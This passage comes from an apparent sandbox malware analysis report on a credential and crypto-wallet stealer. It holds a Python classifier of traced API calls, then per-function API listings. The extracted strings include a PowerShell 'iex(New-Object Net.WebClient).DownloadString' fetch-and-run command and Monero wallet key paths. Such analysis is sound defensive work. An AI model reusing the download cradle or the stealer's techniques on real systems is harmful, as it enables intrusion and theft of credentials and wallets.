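            if c.api in ("RegOpenKeyExA", "RegEnumValueA") or (c.api == "StrStrA" and "Password" in c.args)
        ]
    # Download to disk: an InternetReadFile loop feeding a file opened with GENERIC_WRITE.
    writes = [c for c in calls if c.api == "CreateFileA" and len(c.args) > 1
              and "GENERIC_WRITE" in decode_access(c.args[1])]
    if has(calls, "InternetReadFile") and writes and has(calls, "WriteFile"):
        found["download_to_disk"] = [c.ref for c in writes]
    # Browser account-token lookup: the "AccountId" marker searched before the token_service query.
    if has(calls, "StrStrA", "AccountId"):
        found["browser_account_token_lookup"] = [c.ref for c in calls if c.api == "StrStrA" and "AccountId" in c.args]
    return found


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for tag, refs in classify(parsed).items():
        joined = ", ".join(f"{r:08X}" for r in refs)
        print(f"{tag:30s} {joined}")
```

                             Paste the "APIs" lines of any further function entry into SAMPLE_TRACE to see which rule, if any, fires for it; the returned addresses are the `ref:` values, so they can be used directly as jump targets in the IDA snapshot the report links.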
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                            • Instruction ID: f9f427c572ab6a67ac0c4e0525b1532d487a78faf117dedd3129fc90ed726f3d
                            • Opcode Fuzzy Hash: a3994cf969457cde15c60657038b488ee9885195568b9cf470cce0611abc5d6e
                            • Instruction Fuzzy Hash: AEF0583090820DEFD748AFE0ED1DB6CBB74FB0470BF040199F6498A790EA704B419BA6
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00684FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00684FD1
                            • InternetOpenA.WININET(006A0DDF,00000000,00000000,00000000,00000000), ref: 00684FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685041
                            • InternetCloseHandle.WININET(?), ref: 006850B9
                            • InternetCloseHandle.WININET(?), ref: 006850C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: b64ff51ef5019e2c22e9beb6779b1696bf7f8bdf9f90769bf6b78435f064ea63
                            • Instruction ID: 39d110897a3fd39c7d440c2cf97b93af754b6efcef05eae3574a1a4393a238ac
                            • Opcode Fuzzy Hash: b64ff51ef5019e2c22e9beb6779b1696bf7f8bdf9f90769bf6b78435f064ea63
                            • Instruction Fuzzy Hash: 1331E4B4A4021CABDB24DF54DC85BDCB7B5FB48708F1081E9EA09A7281C6706AC58F99
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                            • wsprintfA.USER32 ref: 00698459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,013ADF48,00000000,000F003F,?,00000400), ref: 006984EC
                            • lstrlen.KERNEL32(?), ref: 00698501
                            • RegQueryValueExA.ADVAPI32(00000000,013ADF18,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,006A0B34), ref: 00698599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00698608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0069861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                            • Instruction ID: d43f031d78324e430754a0d7ac8fb52dd1c93ca5ba51c03f7c7904f3f0f632ad
                            • Opcode Fuzzy Hash: 3cc7d79d73d6e6218b3bbd559e619537b6412b530e9c9303d0cd61305a888e50
                            • Instruction Fuzzy Hash: 3721D67191022CAFDB68DB54DC85FE9B3B9FB48704F00C598A649A6240DE71AA85CFE4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006976A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006976AB
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B7E0,00000000,00020119,00000000), ref: 006976DD
                            • RegQueryValueExA.ADVAPI32(00000000,013ADE88,00000000,00000000,?,000000FF), ref: 006976FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00697708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                            • Instruction ID: eca3a8a2fd42452c9dc7913312eb2aa4cab177b105e3fd6d8e01069622f18d4f
                            • Opcode Fuzzy Hash: fec9e69d27e84c41e15e5c19e2d0e688c0bd42f15acc8c533baeb688be7d67a6
                            • Instruction Fuzzy Hash: 0E0162B5A04208BBEB04DBE4DC4DFBEB7BDFB48705F104054FA04EB290D67099048B51
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0069773B
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B7E0,00000000,00020119,006976B9), ref: 0069775B
                            • RegQueryValueExA.ADVAPI32(006976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0069777A
                            • RegCloseKey.ADVAPI32(006976B9), ref: 00697784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                            • Instruction ID: f23030703108f302c0a53459626327028e8a21bd1548e73eff2321a411ba3e0a
                            • Opcode Fuzzy Hash: e079cccb25b1c0f5a72a43c77416fe0d1fdf9d50b91cb191057724721e04f7db
                            • Instruction Fuzzy Hash: AB01FFB5A40308BBEB04DBE4DC4AFAEB7B8FB48705F104559FA05A7281DA715A008B51
                            APIs
                            • CreateFileA.KERNEL32(:i,80000000,00000003,00000000,00000003,00000080,00000000,?,00693AEE,?), ref: 006992FC
                            • GetFileSizeEx.KERNEL32(000000FF,:i), ref: 00699319
                            • CloseHandle.KERNEL32(000000FF), ref: 00699327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :i$:i
                            • API String ID: 1378416451-3159782484
                            • Opcode ID: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                            • Instruction ID: b6483a82c526e8679f64a02452f71716c278dff5426dab02b160c6d990979f93
                            • Opcode Fuzzy Hash: fa9ff69ce0106284e29a6f71f51700d4b72881d024939a2a0cc4a1aa7005de83
                            • Instruction Fuzzy Hash: F1F01475E40208ABDF14DFB4DC49F9E77BABB48720F108258AA91A72C0D671AA018B60
                            APIs
                            • memset.MSVCRT ref: 006940D5
                            • RegOpenKeyExA.ADVAPI32(80000001,013AD138,00000000,00020119,?), ref: 006940F4
                            • RegQueryValueExA.ADVAPI32(?,013AD858,00000000,00000000,00000000,000000FF), ref: 00694118
                            • RegCloseKey.ADVAPI32(?), ref: 00694122
                            • lstrcat.KERNEL32(?,00000000), ref: 00694147
                            • lstrcat.KERNEL32(?,013AD8B8), ref: 0069415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                            • Instruction ID: 07802b373791e756e176d0fff57a86ebd99e98c4738a18932a3b2143891a84a3
                            • Opcode Fuzzy Hash: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                            • Instruction Fuzzy Hash: 5A4189B6D0010C6BDB18FBA0EC56FFE737DBB88304F00455DB61697181EA755B888B92
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                            • LocalFree.KERNEL32(0068148F), ref: 00689A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                            • Instruction ID: 765e87513dbaaae75a2fdaa2f3b445dde7baf82764d28dc5f07e325306fbc69e
                            • Opcode Fuzzy Hash: 11e7786939399dafd02f473276b2a185c402d62c46f62af2909560beddbda477
                            • Instruction Fuzzy Hash: DC31F3B4A00209EFDB18DF94C985BEE77BABF48304F108258E911A7390D775AA41CFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: c90c4fc4e796669c140048341d5f868adabe687ee4ad6b97d9c8cba08968e478
                            • Instruction ID: 1a5310292cc60ad36df305448b79d33a10235566f040045a88699005c4e167ef
                            • Opcode Fuzzy Hash: c90c4fc4e796669c140048341d5f868adabe687ee4ad6b97d9c8cba08968e478
                            • Instruction Fuzzy Hash: DB4134B110078C5EDF218B24CD84FFBBBEEAF05314F1444ECE98A86582E2719A45DF24
                            APIs
                            • lstrcat.KERNEL32(?,013AD918), ref: 006947DB
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694801
                            • lstrcat.KERNEL32(?,?), ref: 00694820
                            • lstrcat.KERNEL32(?,?), ref: 00694834
                            • lstrcat.KERNEL32(?,0139B220), ref: 00694847
                            • lstrcat.KERNEL32(?,?), ref: 0069485B
                            • lstrcat.KERNEL32(?,013AD3B8), ref: 0069486F
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                              • Part of subcall function 00694570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                              • Part of subcall function 00694570: RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                              • Part of subcall function 00694570: wsprintfA.USER32 ref: 006945A6
                              • Part of subcall function 00694570: FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                            • Instruction ID: d5c2a67e9a39eb1cbaa07e4991f9ca75f096378449b7f9dab660a76c21a7b2e0
                            • Opcode Fuzzy Hash: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                            • Instruction Fuzzy Hash: 37316EB290021CABCB54FBB0DC85EE9737DBB48704F40459DB31996081EE749689CB9A
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00692D85
                            Strings
                            • ')", xrefs: 00692CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692D04
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692CC4
                            • <, xrefs: 00692D39
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                            • Instruction ID: 2cdf2450af6432163caf6e7ac4337061ccc5120c63ebada4283a0595b62eb039
                            • Opcode Fuzzy Hash: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                            • Instruction Fuzzy Hash: 3541CB718102189ADF54FBE0C992BEDB7BABF14300F40411DE006A7591DF746A4ACFDA
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00689F41
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 033ca968dbbd1361f1104e786985b8d3d7ca87894612e9e8c24324a85e7be466
                            • Instruction ID: 87768a7ec25cd7aab2df2c047baa0a1a6f321b78b1bb7d6349272c1b60004b9d
                            • Opcode Fuzzy Hash: 033ca968dbbd1361f1104e786985b8d3d7ca87894612e9e8c24324a85e7be466
                            • Instruction Fuzzy Hash: C5612D70A10248DBDF14EFA4CD96FED77BAAF45304F008118F90A9F591EB706A06CB96
                            APIs
